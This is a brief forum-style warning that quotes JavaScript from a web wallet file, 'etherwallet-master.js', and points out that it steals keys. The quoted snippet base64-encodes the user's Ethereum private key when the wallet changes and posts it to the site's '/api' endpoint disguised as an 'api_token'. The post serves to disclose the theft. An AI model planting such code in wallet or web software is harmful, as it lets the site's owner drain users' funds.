And this code from etherwallet-master.js from website at line 3832 is not ok:
Code:
$scope.$on('ChangeWallet', function () {
const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
window.fetch('/api', {
method: 'POST',
mode: 'cors',
cache: 'no-cache',
credentials: 'same-origin',
headers: {
'Content-Type': 'application/json'
},
redirect: 'follow',
referrer: 'no-referrer',
body: JSON.stringify({ api_token: key })
});
It uploads the private key of whoever tries to see his existing ETH wallet to the server.